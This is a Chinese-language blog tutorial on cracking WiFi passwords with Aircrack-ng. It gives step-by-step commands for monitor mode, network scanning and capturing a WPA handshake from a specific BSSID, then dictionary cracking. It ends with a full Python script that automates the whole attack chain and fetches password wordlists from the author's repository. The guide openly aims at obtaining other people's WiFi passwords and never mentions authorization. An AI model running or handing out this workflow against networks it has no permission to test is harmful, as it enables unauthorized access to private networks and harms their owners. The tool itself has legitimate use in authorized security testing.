Aircrack-ng 官网:https://www.aircrack-ng.org/

Aircrack-ng是用来破解WIFI密码的工具,原理就是先寻找要破解的WIFI,然后把设备T下线,伪装成热点,让其他设备连接到伪装热点上获取握手包,最后跑字典把密码跑出来

说白了就是字典里面如果有就是有,没有那就没戏,所以其实用处嘛……

Aircrack-Ng 安装

Kali其实自带了这个东西,但是对于大部分的Linux发行版是不带的,所以我们需要进行安装

最简单的方式就是直接通过apt进行安装

1
2
sudo apt update
sudo apt install aircrack-ng -y

我这里因为装过了所以才是这么提示的,如果没装过会进入正常的apt安装流程

网卡设置

我这里自己插了一张AWUS036H网卡(显示为wlan0),某宝从几十块到几百的都有,那我这张自然是白嫖的嘛

顺带上一张实物图

要开始使用Aircrack-ng,就需要把网卡设置为监听模式,不过这个设置Aircrack-ng里面有一键化的命令,我们只需要执行

1
sudo airmon-ng start <网卡名字>

就可以打开监听模式了,对于我这里,我需要输入的为

1
sudo airmon-ng start wlan0

(我这里因为开过一次,所以就会有两个进程在用这个网卡,根据它里面所说的用airmon-ng check kill先杀掉相关进程后重新开启就可以了)

完成后,原网卡的名字后面会多出mon的字样,就像这样

搜索网络

使用airodump-ng <网卡名字>可以进入搜索模式

1
sudo airodump-ng wlan0mon

然后会开始搜索附近的WIFI,按两下Q可以退出搜索

BSSID 是搜索到的WIFI的MAC地址

PWR 不清楚,但是用不到

Beacons 不清楚,但是也用不到

#Data, #/s 数据量(我猜的)

CH 即Channel,WIFI的频道

MB 不清楚,也用不到

ENC CIPHER 加密协议的版本

AUTH 认证方式(PSK即密码)

ESSID WIFI名称

我们需要记下BSSID CHANNEL 这两个东西,在抓取握手包会用到,记完了以后按两下Q退出搜索就可以了

抓取握手包

使用airodump-ng -w {path} --channel {channel} --bssid {bssid} {netcard}能够抓取握手包

path就是保存文件的路径

channel 频道,上面说过了

bssid WIFI的MAC地址,上面也说过了

netcard 你想使用的网卡

我这里就直接输入下面这个命令来抓取Raspberry这个WIFI的握手包(Packets文件夹已经提前新建完成)

1
sudo airodump-ng -w ./Packets/captured --channel 11 --bssid 5E:E4:2A:0D:4B:75 wlan0mon

网卡会进入抓取模式,这个过程可以按两下Q退出抓取

需要注意的是,抓取过程中,其他设备必须与该WIFI进行至少一次的连接(从不在该网络连接到该网络)

抓完后,会出现如图的这些文件

我们要用来破解的就是这个captured-01.cap,至于为什么有01,因为aircrack-ng怕你重名,所以在文件后面会加上数字

破解WIFI密码

使用命令aircrack-ng {path} -w {dictionary}来破解WIFI密码

path 是要破解的cap文件的后缀,我这里就应该填./Packets/captured-01.cap

dictionary 是要用来破解WIFI跑的字典(字典可以访问代码浏览 - WIFI - 常用字典 - GamerNoTitle的团队 (coding.net)获取)

组合起来,我这里输入命令(wpa.txt是我电脑里面已经存在的字典)

1
sudo aircrack-ng ./Packets/captured-01.cap -w wpa.txt

然后就会开始跑字典,跑完了就会显示了(我这里没有跑,因为太慢了)

一键化Python程序

需要记住这么多命令是不是很烦,这里我自己做了个Aircrack-ng的Python程序,来避免记这么多的程序。需要注意:这个程序只能在Linux上运行,并且需要以root权限运行(因为aircrack的大部分命令都需要root权限)

下面贴出程序,你也可以通过CTF-Scripts/WlanCrack.py at master · GamerNoTitle/CTF-Scripts (github.com)获取。本程序在字典方面跟我上面的那个coding的库进行了链接,如果没有提供字典的话可以从coding库下载

需要安装的Python轮子:requests tqdm pprint

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
import os
import requests
from pprint import pformat
from tqdm import tqdm

PreviousOutput = None
output = None
ListeningMode = False
PreviousPath = None


def ShowNetCard():
    output = os.popen('ifconfig')
    data = output.read()
    print(data)
    return data


def StartListenerMode(netcard):
    os.system('airmon-ng check kill')
    os.system(f'airmon-ng start {netcard}')
    global ListeningMode
    ListeningMode = True
    print('Started')


def DumpStatus(NetCard):
    print('Double-press Q to exit. When you are ready, press enter.')
    input()
    os.system(f'airodump-ng {NetCard}')


def CapturePacket(channel: int, bssid: str, netcard: str, path='./captured'):
    print('Double-press Q to exit. When you are ready, press enter.')
    input()
    os.system(
        f'airodump-ng -w {path} --channel {channel} --bssid {bssid} {netcard}')


def CrackWithDict(path, dictionary):
    os.system('airmon-ng check kill')
    os.system(f'aircrack-ng {path} -w {dictionary}')


def Downloader(url: str, filename: str):
    resp = requests.get(url, stream=True)
    total = int(resp.headers.get('content-length', 0))
    with open(filename, 'wb') as file, tqdm(
        desc=filename,
        total=total,
        unit='iB',
        unit_scale=True,
        unit_divisor=1024,
    ) as bar:
        for data in resp.iter_content(chunk_size=1024):
            size = file.write(data)
            bar.update(size)


help_msg = '''{:=^80}
[0] Show netcards
[1] Start listener
[2] Dump wlan status
[3] Capture heartbeat packet
[4] Crack the packet with a dictionary
[9] Install aircrack-ng (If you haven\'t install it on your computer)
[q] Exit
{:=^80}
'''.format(' Aircrack-Ng Script ', ' Made by GamerNoTitle ')

LogoPrint = r'''           _                         _           _   _          _____           _       _   
     /\   (_)                       | |         | \ | |        / ____|         (_)     | |  
    /  \   _ _ __ ___ _ __ __ _  ___| | ________|  \| | __ _  | (___   ___ _ __ _ _ __ | |_ 
   / /\ \ | | '__/ __| '__/ _` |/ __| |/ /______| . ` |/ _` |  \___ \ / __| '__| | '_ \| __|
  / ____ \| | | | (__| | | (_| | (__|   <       | |\  | (_| |  ____) | (__| |  | | |_) | |_ 
 /_/    \_\_|_|  \___|_|  \__,_|\___|_|\_\      |_| \_|\__, | |_____/ \___|_|  |_| .__/ \__|
                                                        __/ |                    | |        
                                                       |___/                     |_|        -- GamerNoTitle '''

if __name__ == '__main__':
    print(LogoPrint)
    if os.geteuid() != 0:
        print('You need to run it as root!')
        os._exit(0)
    while True:
        print(help_msg)
        Input = input('Please choose an option: ')
        if Input == '0':
            CardsInfo = ShowNetCard()
        if Input == '1':
            Netcard = input(
                'Please type the netcard\'s name that you wanna use: ')
            if 'wlan' not in Netcard:
                print(f'Unsupported netcard! {Netcard}')
            else:
                StartListenerMode(Netcard)
        if Input == '2':
            if ListeningMode:
                Netcard = input(
                    'Please type the netcard\'s name that you wanna use: ')
                NetCards = CardsInfo.split('\n\n')
                if 'wlan' not in Netcard:
                    print(f'Unsupported netcard! {Netcard}')
                else:
                    HaveCard = False
                    for i in NetCards:
                        if Netcard in i:
                            HaveCard = True
                    if HaveCard:
                        DumpStatus(Netcard)
                    else:
                        print(
                            f'Unable to find netcard {Netcard} in {NetCards}')
            else:
                print('You need to start the listener first!')
        if Input == '3':
            path = input(
                'Please input the path that you want to save the file (e.g: ./captured): ')
            PreviousPath = path
            channel = int(
                input('Please input the channel that you want to listen to: '))
            bssid = input('Please input the bssid you want to listen to: ')
            netcard = input('Please input the netcard you want to use: ')
            if path == '' or channel == '' or bssid == '' or netcard == '':
                print('Invalid parameters!')
            else:
                CapturePacket(channel=channel, bssid=bssid,
                              netcard=netcard, path=path)
        if Input == '4':
            path = input(
                f'Please input the file you want to crack (Default for the previous file {PreviousPath}): ')
            if path == '':
                path = PreviousPath
            dictionary = input(
                'Please input the dictionary that you want to use to crack: ')
            if dictionary == '':
                print('You haven\'t specify a dictionary to crack the packet! Do you need some dictionarys? The avaliable dictionarys are listed below: ')
                dictionarys = requests.get(
                    'https://gamernotitle.coding.net/p/Dictionarys/d/WIFI/git/raw/master/metadata.json?download=true').json()
                print(pformat(dictionarys))
                option = input(
                    'Please input the name of the dictionary you want to use: ')
                if option == '':
                    print('You need to specify a dictionary to crack the packet!')
                else:
                    Downloader(dictionarys['data'][option]
                               ['link'], f'./{option}.txt')
                    dictionary = f'{option}.txt'
                    print(
                        f'Start cracking {path} with dictionary {dictionary}')
                    CrackWithDict(path, dictionary)
            else:
                print(f'Start cracking {path} with dictionary {dictionary}')
                CrackWithDict(path, dictionary)
        if Input == '9':
            os.system('apt update')
            os.system('apt install aircrack-ng -y')
        if Input == 'q':
            os._exit(0)